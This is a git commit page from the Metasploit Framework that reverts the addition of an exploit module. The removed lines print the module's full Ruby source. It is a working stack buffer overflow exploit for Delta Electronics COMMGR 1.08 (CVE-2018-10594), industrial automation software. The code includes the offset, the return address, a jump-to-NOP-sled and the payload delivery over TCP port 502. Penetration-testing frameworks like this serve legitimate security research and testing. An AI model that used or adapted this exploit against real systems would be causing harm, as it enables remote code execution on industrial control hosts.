Revert "Added exploit module for Delta Electronics Delta Industrial Automation COMMGR 1.08 Buffer Overflow"

This reverts commit 1a9aa8ac3b. Need to branch it.
2018-09-19 13:20:00 +08:00 · 2018-09-19 13:20:00 +08:00 · 5b6938e942
parent 1a9aa8ac3b
commit 5b6938e942
1 changed files with 0 additions and 76 deletions
--- a/modules/exploits/windows/scada/delta_ia_commgr_bof.rb
+++ b/modules/exploits/windows/scada/delta_ia_commgr_bof.rb
@ -1,76 +0,0 @@
-##
-# This module requires Metasploit: https://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
-
-  include Msf::Exploit::Remote::Tcp
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Buffer Overflow',
-      'Description'    => %q{
-        This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
-        Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
-        crafted packets. This module has been tested successfully on Delta Electronics Delta
-        Industrial Automation COMMGR 1.08 over
-          Windows XP SP3,
-          Windows 7 SP1,
-          Windows 8.1, and
-          Windows 10.
-      },
-      'Author'         =>
-        [
-          't4rkd3vilz',     # Denial-of-service PoC
-          'hubertwslin',    # Metasploit module
-        ],
-      'References'     =>
-        [
-          [ 'EDB', '44965'],
-          [ 'CVE', '2018-10594']
-        ],
-      'Payload'        =>
-        {
-          'Space'          => 640,
-          'DisableNops'    => true,
-          'BadChars'       => "\x00"
-        },
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread',
-        },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          [ 'COMMGR 1.08 / Windows Universal',
-            {
-              'Ret'    => 0x00401e14, # p/p/r COMMGR.exe
-              'Offset' => 4164
-            }
-          ],
-        ],
-      'DisclosureDate' => 'Jul 02 2018',
-      'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        Opt::RPORT(502)
-      ])
-  end
-
-  def exploit
-    data =  rand_text_alpha(target['Offset'])
-    data << "\xeb\x27\x90\x90"    # jmp short $+27 to the NOP sled
-    data << [target.ret].pack("V")
-    data << make_nops(40)
-    data << payload.encoded
-
-    print_status("Trying target #{target.name}, sending #{data.length} bytes...")
-    connect
-    sock.put(data)
-    disconnect
-  end
-end
-